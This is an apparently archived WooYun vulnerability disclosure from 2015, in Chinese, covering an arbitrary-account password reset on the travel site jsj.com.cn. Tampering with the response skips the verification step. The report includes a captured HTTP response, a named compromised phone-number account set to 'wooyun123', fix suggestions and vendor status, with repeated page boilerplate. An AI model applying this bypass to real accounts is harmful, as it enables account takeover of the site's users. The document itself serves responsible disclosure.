商旅安全之金色世纪商旅网设计缺陷导致任意账户密码重置（土豪账户演示）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0128728

漏洞标题：商旅安全之金色世纪商旅网设计缺陷导致任意账户密码重置（土豪账户演示）

漏洞作者：路人甲

提交时间：2015-07-23 23:59

修复时间：2015-09-10 20:26

公开时间：2015-09-10 20:26

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-23：细节已通知厂商并且等待厂商处理中
2015-07-27：厂商已经确认，细节仅向厂商公开
2015-08-06：细节向核心白帽子及相关领域专家公开
2015-08-16：细节向普通白帽子公开
2015-08-26：细节向实习白帽子公开
2015-09-10：细节向公众公开

简要描述：

1998年创立至今，北京金色世纪商旅网络科技股份有限公司积累了丰富的商旅服务专业经验，创建了"D2D" 商旅全程管家服务的全新模式。
截止到2014年底，金色世纪拥有36家分支机构、1200名员工、23个机场&高铁金色逸站，向超过200万会员提供"D2D商旅全程管家服务"。未来3—5年，机场&高铁金色逸站将达到50个，基本覆盖省会及其它重点城市。

详细说明：

漏洞地址：

http://member.jsj.com.cn/findpwd?type=1

1、输入目标账户，直接更改返回包为正常响应包跳到第三步，跳过验证码验证环节

正常响应包如下：

HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 23 Jul 2015 09:41:15 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MobileCard=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Set-Cookie: MobileCardJSJID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Content-Length: 5851
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>è®¾ç½®æ°å¯ç </title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
    <link href="http://file.jsj.com.cn/css/member/header_footer.css" rel="stylesheet" type="text/css" media="all">
    <link href="http://file.jsj.com.cn/css/member/login.css" rel="stylesheet" type="text/css" media="all">
    <link href="http://file.jsj.com.cn/css/public/public.css" rel="stylesheet" type="text/css" media="all">
    <link rel="shortcut icon" href="http://file.jsj.com.cn/images/public/favicon.ico" type="image/x-icon"/>
    <script type="text/javascript" src='http://file.jsj.com.cn/js/member/login.js'></script>
    <script type="text/javascript" src='http://file.jsj.com.cn/js//jquery.js'></script>
    <script type="text/javascript" src='http://file.jsj.com.cn/js//jsj.js'></script>
    <script type="text/javascript" src='http://file.jsj.com.cn/js/member/member.findpwd2.js'></script> 
</head>
<body>
    <div class="top_bg">
        <div class="top">
            <a href="http://www.jsj.com.cn/"><div class="logo"></div></a>
        </div>
    </div> 
<div class="findpwd_box">
	<div class="mt">
		<h2>è®¾ç½®æ°å¯ç </h2>
		<b></b>
	</div>
	<div class="mc">
		<div class="step">
			<ul class="reg_step">
				<li class="current"><span></span>éªè¯èº«ä»½</li>
				<li class="current"><span></span>è®¾ç½®æ°å¯ç </li>
				<li><span></span>å®æ</li>
			</ul>
		</div>
		<div class="form">
			<form action='/index/findpwd3' method='post'>
				<div class="item"><span class="label">æ°ç»å½å¯ç ï¼</span><div class="left"><input id='newpwd1' type="password" name="newpwd1" /><span class="clr"></span><label class="msg-error"></label></div></div>
				<div class="item"><span class="label">ç¡®è®¤æ°å¯ç ï¼</span><div class="left"><input id='newpwd2' type="password" name="newpwd2" /><span class="clr"></span><label class="msg-error"></label></div></div>
				<div class="item"><span class="label">&nbsp;</span><div class="left user_form"><a name="next" class="btnstep">æäº¤</a></div></div>
			</form>
		</div>
	</div>
</div>
<div class="ft">
	<div class="foot">
        <div class="footer_con">
		<div class="contant">
			<ul>
			  <li><a href="http://www.jsj.com.cn/BottomLink/about_intro.aspx">å³äºæä»¬</a><u>|</u></li>
			  <!--<li><a href="http://www.jsj.com.cn/BottomLink/D2D/index.html"> D2Dæå¡</a><u>|</u></li>-->
			  <li><a href="http://www.jsj.com.cn/sitemap.aspx"> ç½ç«å°å¾</a><u>|</u></li>
              <!--<li><a href="http://gc.jsj.com.cn/bscrm/ebooking/login.aspx">éåºç»å½</a><u>|</u></li>-->
			  <li><a href="http://www.jsj.com.cn/BottomLink/dfdl.aspx">ä»£çä¸å¿</a><u>|</u></li>
			  <li><a href="http://www.jsj.com.cn/BottomLink/job.aspx">æèä¿¡æ¯</a><u>|</u></li>
			  <li><a href="http://www.jsj.com.cn/Card/index.html">VIPæå¡</a><u>|</u></li>
			  <li><a href="http://www.jsj.com.cn/BottomLink/about_department.aspx">èç³»æä»¬</a><u>|</u></li>
			  <li><a href="http://www.jsj.com.cn/BottomLink/flink.aspx">åæé¾æ¥</a></li>
			  <!--<li><a href="http://forum.jsj.com.cn/">ä¼åè®ºå</a></li>-->
			</ul>
		</div>
		<div class="contant_t">
            <p>ICPå¤12022924å· äº¬å¬ç½å®å¤110105017926å· å¢å¼çµä¿¡ä¸å¡ç»è¥è®¸å¯è¯B2-20060235å·</p>
		    <p>Copyright 1998-2015 jsj.com.cn All Rights Reserved. åäº¬éè²ä¸çºªåæç½ç»ç§æè¡ä»½æéå¬å¸çæææ</p>
            <p>éè²ä¸çºªåæç½æä¾å½éèªçæ¥è¯¢ï¼å½éæºç¥¨é¢è®¢ï¼å½éèªçæ¥è¯¢æ¶å»è¡¨ï¼å½éæºç¥¨ä»·æ ¼æ¥è¯¢ï¼è¿æå½éèªçæè¿è¡æè§å®ä¿¡æ¯ï¼å½éèªçå®æ¶æ¥è¯¢æå¡ä¾æ¨éã</p>
	    </div>
		<!-- <div class="bottom_jp">		
			<ul>
						</ul>
		</div> -->
        <div class="contant_img" align=center><a href="http://www.jsj.com.cn/promotion/cata-zs/index.htm" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img01.gif" style="padding-right:5px;" /></a><a href="http://www.itrust.org.cn/yz/pjwx.asp?wm=2582501947" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img02.gif" style="padding-right:5px;"/></a><a href="https://search.szfw.org/cert/l/CX20120801001603001683" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img03.gif" style="padding-right:5px;" /></a><a href="http://www.anquan.org/s/www.jsj.com.cn" target=_blank><img src="http://file.jsj.com.cn/images/public/ico_footer_img04.gif" /></a></div>		
        </div>
    </div>
 </div>	
<!-- TQ kefu -->
<script language="JavaScript" src=http://float2006.tq.cn/floatcard?adminid=9556114&sort=0></script>
<!-- google tongji -->
<script type="text/javascript">
    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', 'UA-21387771-1']);
    _gaq.push(['_setDomainName', 'jsj.com.cn']);
    _gaq.push(['_trackPageview']);
    _gaq.push(['_trackPageLoadTime']);
    (function () {
        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();
</script>
<!-- baidu tongji -->
<script type="text/javascript">
    var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
    document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Ff73a1947fcd9c6158387fc848ecf4b5a' type='text/javascript'%3E%3C/script%3E"));
</script>
</body>
</html>

2、输入新密码wooyun123,提交直接跳转到登陆状态

漏洞证明：

土豪账号：13333333333，密码：wooyun123：

修复方案：

1、加强服务器验证逻辑，防止顺序执行绕过
2、在最后提交时加入身份验证同步信息

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-07-27 20:24

厂商回复：

CNVD确认所述漏洞情况，暂未建立与网站管理单位的直接处置渠道，待认领。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0128728

漏洞标题：商旅安全之金色世纪商旅网设计缺陷导致任意账户密码重置（土豪账户演示）

相关厂商：金色世纪

漏洞作者：路人甲

提交时间：2015-07-23 23:59

修复时间：2015-09-10 20:26

公开时间：2015-09-10 20:26

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0128728

漏洞标题：商旅安全之金色世纪商旅网设计缺陷导致任意账户密码重置（土豪账户演示）

相关厂商：金色世纪

漏洞作者： 路人甲

提交时间：2015-07-23 23:59

修复时间：2015-09-10 20:26

公开时间：2015-09-10 20:26

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0128728"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云